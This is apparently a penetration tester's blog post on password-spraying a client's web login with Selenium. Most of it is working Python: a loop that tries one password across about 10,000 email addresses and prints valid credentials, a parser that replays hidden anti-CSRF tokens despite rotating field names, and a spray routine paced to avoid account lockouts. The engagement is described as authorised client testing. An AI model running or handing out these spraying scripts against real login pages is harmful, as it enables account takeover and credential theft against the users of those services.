Recently I faced a situation where I had to conduct a password spraying attack for a client. The login page had no CAPTCHA; all it had was a heavy background image, a logo and a simple login form consisting of two input fields and a submit button. Looks easy. That is what I thought. However, I soon realised that there were other hidden input fields, and even the parameter names of the visible input fields changed from one page load to the next. Several HTTP requests were involved in one single login.

Since I had a deadline, I decided to give Selenium a go. Up to this point I had only heard of Selenium and never actually used it.

A quick Google search for how to submit a form using Selenium gave me a boilerplate to start with.


from selenium import webdriver
from selenium.webdriver.common.by import By

driver = webdriver.Chrome()
driver.get('https://your-target-url-here.com')

# Selenium 4 removed find_element_by_id(); find_element(By.ID, ...) is the current form
driver.find_element(By.ID, "username").send_keys("detrapdoor")
driver.find_element(By.ID, "password").send_keys("Sup3rS3cr3tp@ssw0rD")

# Click the login button
driver.find_element(By.ID, "Log_On").click()
driver.close()
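As an added example (not part of the original post or of the boilerplate it found), here is what the hidden-field problem looks like when handled without a browser. A small parser, built on Python's standard-library html.parser rather than Selenium, walks the served login form, keeps every hidden value (anti-CSRF token, nonce) exactly as served, and locates the username and password inputs by type instead of by name, so it does not matter that the names rotate on every load. The HTML below, its field names and its token values are constructed for illustration.

```python
from html.parser import HTMLParser


class LoginFormParser(HTMLParser):
    """Collect the first <form> on the page and every <input> inside it."""

    def __init__(self):
        super().__init__()
        self.form = None
        self._in_form = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and self.form is None:
            self._in_form = True
            self.form = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
        elif tag == "input" and self._in_form:
            self.form["inputs"].append({
                "name": a.get("name"),
                "type": (a.get("type") or "text").lower(),
                "value": a.get("value") or "",
                "checked": "checked" in a,
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_form = False


def parse_login_form(html):
    """Return {"action", "method", "inputs"} for the first form in the served HTML."""
    parser = LoginFormParser()
    parser.feed(html)
    parser.close()
    if parser.form is None:
        raise ValueError("no <form> in page")
    return parser.form


def build_login_payload(form, username, password):
    """Fill the form the way a browser does on submit:
    - every hidden input goes back with the value it was served with
    - the username goes in the first text/email input, whatever its name is today
    - the password goes in the first password input
    - unchecked boxes are omitted; a named submit button is sent as if clicked
    """
    payload, user_field, pass_field = {}, None, None
    for inp in form["inputs"]:
        name, typ = inp["name"], inp["type"]
        if not name or typ in ("reset", "button", "image"):
            continue
        if typ in ("checkbox", "radio") and not inp["checked"]:
            continue
        if typ == "password" and pass_field is None:
            pass_field = name
        elif typ in ("text", "email") and user_field is None:
            user_field = name
        else:
            payload[name] = inp["value"]   # hidden token, nonce, submit button, ...
    if user_field is None or pass_field is None:
        raise ValueError("could not find username and password inputs")
    payload[user_field] = username
    payload[pass_field] = password
    return payload


def payload_for(html, username, password):
    """Convenience wrapper: (method, action, payload) for one login attempt."""
    form = parse_login_form(html)
    return form["method"], form["action"], build_login_payload(form, username, password)


# Constructed sample page: rotating input names plus two hidden anti-CSRF values.
# Names, ids and values are made up for the example.
SAMPLE_FORM = """
<html><body>
<form id="loginForm" method="post" action="/auth/login">
  <input type="hidden" name="__RequestVerificationToken" value="tok-3f9a">
  <input type="hidden" name="__nonce" value="18273645">
  <input type="text" id="username" name="fld_4a1c" placeholder="Email">
  <input type="password" id="password" name="fld_9e77">
  <input type="checkbox" name="remember" value="1">
  <input type="submit" id="Log_On" name="Log_On" value="Log On">
</form>
</body></html>
"""

if __name__ == "__main__":
    print(payload_for(SAMPLE_FORM, "alice@example.com", "Spring2024!"))
```

Posting the returned payload to the form's action with its method, with one cookie jar carried across the GET and the POST, reproduces the browser's submission for a plain HTML form. Whether that is enough depends on whether the extra requests in the login are script-driven; that is exactly the case where driving a real browser earns its keep.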

However, there were around 10,000 email addresses to test. To make the process more efficient I decided to disable images, as they were taking a huge portion of the bandwidth. To disable image loading I added the following code at the top.

from selenium import webdriver

option = webdriver.ChromeOptions()
# Chrome content-setting value 2 = block; the managed key overrides any profile setting
chrome_prefs = {
    "profile.default_content_settings": {"images": 2},
    "profile.managed_default_content_settings": {"images": 2},
}
option.add_experimental_option("prefs", chrome_prefs)

# the chrome_options= keyword has been removed from newer Selenium releases; use options=
driver = webdriver.Chrome(options=option)

The next problem was how to detect whether the login was successful. This was pretty basic. A single Google search revealed that, after the submit button is clicked, driver.page_source returns the HTML of whatever the browser is currently rendering (the DOM after scripts have run, not the raw HTTP response), and a simple if "incorrect" in driver.page_source condition did the trick. One caveat: click() returns once any page navigation it triggers has finished, but if the form is submitted by script, which the several requests per login suggests, nothing navigates and the error message may not be in the DOM yet when the check runs; wait for the error text or a post-login element to appear before reading page_source.

At this point, all that was left was to wrap the initial code in a function and call it in a loop over my list of email addresses.

The final code looked something like this.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait

option = webdriver.ChromeOptions()
chrome_prefs = {
    "profile.default_content_settings": {"images": 2},
    "profile.managed_default_content_settings": {"images": 2},
}
option.add_experimental_option("prefs", chrome_prefs)

driver = webdriver.Chrome(options=option)

password = "PASSWORD123!"

def spray_and_pray(username, password):
    """One login attempt; returns True when the failure text is absent."""
    driver.get('https://your-target-url-here.com')

    driver.find_element(By.ID, "username").send_keys(str(username))
    driver.find_element(By.ID, "password").send_keys(str(password))

    # Click the login button
    driver.find_element(By.ID, "Log_On").click()

    # Wait (up to 10 s) until the app has either shown the error or replaced the
    # login form; assumes the Log_On button is gone after a successful login
    WebDriverWait(driver, 10).until(
        lambda d: "incorrect" in d.page_source or "Log_On" not in d.page_source)
    return "incorrect" not in driver.page_source

with open("userdatalist.csv", "r") as f:
    for line in f:
        username = line.split(',')[0].strip()
        if not username:
            continue
        try:
            if spray_and_pray(username, password):
                print("[+] valid credentials: %s:%s" % (username, password))
        except Exception as e:
            # log rather than silently swallow, so a dead driver doesn't turn
            # every remaining row into a quiet failure
            print("[!] %s: %r" % (username, e))

# keep one browser session for the whole run; close() inside the function
# would end the session after the first user and every later call would fail
driver.quit()

Within a few hours it exhausted the username list and gave a few positives to work with.
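To close, an added example (my own code, not the author's) that tightens two weak spots in the loop above: the bare substring check cannot tell a wrong password from a locked account, and the loop has no plan for a second password. The spray() function below takes the login attempt as a callable (spray_and_pray from the post, changed to return driver.page_source, is what would be plugged in), classifies each rendered page, drops a user once it is locked or cracked, and sprays one password across the whole list before moving to the next, so each account sees a single attempt per round and stays under a lockout threshold. The marker strings, the CSV and the fake backend used in place of a real driver are constructed for the example.

```python
import csv
import io
import time

# Constructed marker strings; match them to the target's actual messages.
FAILURE_MARKERS = ("incorrect", "invalid username or password")
LOCKOUT_MARKERS = ("account is locked", "too many attempts")
SUCCESS_MARKERS = ("logout", "sign out")


def classify_login_result(page_source):
    """Map the rendered page to one of: success, invalid, locked, unknown.
    Lockout is tested first so a page carrying both 'incorrect' and 'locked'
    is not mistaken for a plain wrong password."""
    text = page_source.lower()
    if any(m in text for m in LOCKOUT_MARKERS):
        return "locked"
    if any(m in text for m in FAILURE_MARKERS):
        return "invalid"
    if any(m in text for m in SUCCESS_MARKERS):
        return "success"
    return "unknown"


def read_usernames(csv_text):
    """First column of each row; blanks and duplicates dropped, order preserved."""
    seen, users = set(), []
    for row in csv.reader(io.StringIO(csv_text)):
        user = row[0].strip() if row else ""
        if user and user not in seen:
            seen.add(user)
            users.append(user)
    return users


def spray(usernames, passwords, attempt, delay=0.0):
    """Spray one password across every user per round.
    attempt(username, password) must return the rendered page source.
    Returns (hits, locked, unknown)."""
    hits, locked, unknown, skip = [], [], [], set()
    for password in passwords:
        for user in usernames:
            if user in skip:
                continue
            try:
                result = classify_login_result(attempt(user, password))
            except Exception as exc:        # driver errors: record and keep going
                unknown.append((user, password, repr(exc)))
                continue
            if result == "success":
                hits.append((user, password))
                skip.add(user)              # no need to keep hitting a cracked account
            elif result == "locked":
                locked.append(user)
                skip.add(user)              # further attempts only extend the lockout
            elif result == "unknown":
                unknown.append((user, password, "unrecognised page"))
            if delay:
                time.sleep(delay)
    return hits, locked, unknown


# Constructed stand-in for the real attempt function: a fake backend with two
# valid credential pairs and one already-locked account.
_FAKE_CREDS = {"alice@example.com": "Spring2024!", "bob@example.com": "Hunter2!"}
_FAKE_LOCKED = {"carol@example.com"}


def fake_attempt(username, password):
    if username in _FAKE_LOCKED:
        return "<p>Your account is locked. Contact the helpdesk.</p>"
    if _FAKE_CREDS.get(username) == password:
        return "<a href='/logout'>Logout</a><h1>Dashboard</h1>"
    return "<p>Username or password is incorrect.</p>"


# Constructed user list in the same shape as userdatalist.csv (email first column).
SAMPLE_CSV = (
    "alice@example.com,Alice\n"
    "bob@example.com,Bob\n"
    "carol@example.com,Carol\n"
    "\n"
    "alice@example.com,dup\n"
    "dave@example.com,Dave\n"
)

if __name__ == "__main__":
    users = read_usernames(SAMPLE_CSV)
    print(spray(users, ["Spring2024!", "Hunter2!"], fake_attempt))
```

The delay between attempts and the gap between password rounds should come from the client's lockout policy (threshold and observation window), not from a guess; the classifier's "unknown" bucket is worth reviewing by hand, since a page that matches none of the markers usually means the wait before reading page_source was too short or the application changed its error text.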

Reach out to me @detrapdoor